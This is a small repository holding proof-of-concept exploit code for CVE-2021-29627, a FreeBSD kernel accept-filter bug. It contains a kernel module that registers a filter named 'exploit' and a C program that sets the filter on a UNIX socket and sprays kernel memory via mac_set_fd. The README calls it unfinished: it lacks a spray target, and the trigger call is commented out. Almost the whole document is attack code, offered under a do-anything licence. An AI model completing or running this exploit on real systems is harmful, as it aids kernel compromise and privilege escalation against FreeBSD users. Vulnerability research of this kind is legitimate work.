├── mod
    ├── Makefile
    └── accept_filter_mod.c
├── README.md
├── LICENSE.md
└── exploit
    └── main.c


/mod/Makefile:
--------------------------------------------------------------------------------
1 | KMOD=	exploit
2 | SRCS=	accept_filter_mod.c
3 | 
4 | .include <bsd.kmod.mk>
5 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-29627
2 | Some code to trigger the bug incl. mac_set_fd spray. Need some spray target, 
3 | though.


--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
 1 |         DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 
 2 |                     Version 2, December 2004 
 3 | 
 4 |  Copyright (c) 2021, Karsten König grayfox@outerhaven.de
 5 | 
 6 | 
 7 |  Everyone is permitted to copy and distribute verbatim or modified 
 8 |  copies of this license document, and changing it is allowed as long 
 9 |  as the name is changed. 
10 | 
11 |             DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 
12 |    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 
13 | 
14 |   0. You just DO WHAT THE FUCK YOU WANT TO.
15 | 
16 | 


--------------------------------------------------------------------------------
/mod/accept_filter_mod.c:
--------------------------------------------------------------------------------
 1 | #include <sys/cdefs.h>
 2 | __FBSDID("$FreeBSD$");
 3 | 
 4 | #define ACCEPT_FILTER_MOD
 5 | 
 6 | #include <sys/param.h>
 7 | #include <sys/kernel.h>
 8 | #include <sys/module.h>
 9 | #include <sys/sysctl.h>
10 | #include <sys/signalvar.h>
11 | #include <sys/socketvar.h>
12 | 
13 | static int sohasdata(struct socket *so, void *arg, int waitflag);
14 | static void * create_stub(struct socket *so, char *arg);
15 | 
16 | ACCEPT_FILTER_DEFINE(accf_exploit, "exploit", sohasdata, create_stub, NULL, 1);
17 | 
18 | static int
19 | sohasdata(struct socket *so, void *arg, int waitflag)
20 | {
21 | 
22 | 	if (!soreadable(so))
23 | 		return (SU_OK);
24 | 
25 | 	return (SU_ISCONNECTED);
26 | }
27 | 
28 | static void *
29 | create_stub(struct socket *so, char *arg) 
30 | {
31 |     return (void *)1;
32 | }


--------------------------------------------------------------------------------
/exploit/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdlib.h>
  3 | #include <string.h>
  4 | #include <unistd.h>
  5 | #include <sys/mac.h>
  6 | #include <sys/types.h>
  7 | #include <sys/socket.h>
  8 | #include <sys/un.h>
  9 | #include <netinet/in.h>
 10 | #include <netinet/ip6.h>
 11 | 
 12 | #define TARGET_SOCK_PATH "/tmp/exploit"
 13 | #define N_SPRAY_SOCKETS 8
 14 | 
 15 | int new_target_socket() {
 16 |     return socket(AF_UNIX, SOCK_STREAM, 0);
 17 | }
 18 | 
 19 | // TODO dynamic buf_len
 20 | size_t prepare_mac_spray_buf(uint8_t **buf, size_t buf_len) {
 21 |     *buf = calloc(8, sizeof(uint8_t));
 22 |     strncpy((char *)*buf, "AAAAAAA", 16);
 23 |     return 8;
 24 | }
 25 | 
 26 | int mac_set_fd_spray(uint8_t *buf, size_t buf_len) {
 27 |     mac_t mac;
 28 | 
 29 |     mac = calloc(1, sizeof(struct mac));
 30 |     mac->m_buflen = buf_len;
 31 |     mac->m_string = (char *)buf;
 32 |     mac_set_fd(-1, mac);
 33 |     return 0;
 34 | }
 35 | 
 36 | int set_filter_on_socket(int socket) {
 37 |     struct accept_filter_arg arg;
 38 |     
 39 |     strncpy(arg.af_name, "exploit", 16);
 40 |     return setsockopt(socket, SOL_SOCKET, SO_ACCEPTFILTER, &arg, sizeof(struct accept_filter_arg));
 41 | }
 42 | 
 43 | int delete_filter_on_socket(int socket) {
 44 |     return setsockopt(socket, SOL_SOCKET, SO_ACCEPTFILTER, NULL, 0);
 45 | }
 46 | 
 47 | int make_socket_listening(int socket) {
 48 |     struct sockaddr_un sockaddr;
 49 | 
 50 |     sockaddr.sun_family = AF_UNIX;   
 51 |     strcpy(sockaddr.sun_path, TARGET_SOCK_PATH);
 52 | 
 53 |     unlink(TARGET_SOCK_PATH);
 54 |     if ((bind(socket, (struct sockaddr *)&sockaddr, sizeof(sockaddr))) == -1)
 55 |     {
 56 |         printf("[!] Bind failed\n");
 57 |         return -1;
 58 |     }
 59 | 
 60 |     if ((listen(socket, 1)) == -1)
 61 |     {
 62 |         printf("[!] Listen failed\n");
 63 |         return -1;
 64 |     }
 65 |     return 0;
 66 | }
 67 | 
 68 | int main() {
 69 |     int target_socket;
 70 |     uint8_t *spray_buf;
 71 |     size_t spray_buf_len;
 72 | 
 73 |     if ((target_socket = new_target_socket()) == -1) {
 74 |         printf("[!] Could not create target socket\n");
 75 |         perror("Reason");
 76 |         return 1;
 77 |     }
 78 |     printf("[+] target_socket: %d\n", target_socket);
 79 | 
 80 |     if ((make_socket_listening(target_socket)) == -1) {
 81 |         printf("[!] Could not listen on target_socket\n");
 82 |         perror("Reason");
 83 |         return 1;        
 84 |     }
 85 | 
 86 |     if ((set_filter_on_socket(target_socket)) == -1) {
 87 |         printf("[!] Could not set accept filter on target_socket\n");
 88 |         perror("Reason");
 89 |         return 1;
 90 |     }
 91 | 
 92 |     if ((spray_buf_len = prepare_mac_spray_buf(&spray_buf, 16)) == 0) {
 93 |         goto fail;
 94 |     }
 95 |     printf("[+] spray_buf_len: %zu\n", spray_buf_len);
 96 | 
 97 |     if (mac_set_fd_spray(spray_buf, spray_buf_len) == -1) {
 98 |         goto fail;
 99 |     }
100 | 
101 | /*     if ((delete_filter_on_socket(target_socket)) == -1) {
102 |         printf("[!] Could not trigger accept filter bug on target_socket\n");
103 |         perror("Reason");
104 |         return 1;
105 |     }     */
106 | 
107 | fail:
108 |     return 1;
109 | }


--------------------------------------------------------------------------------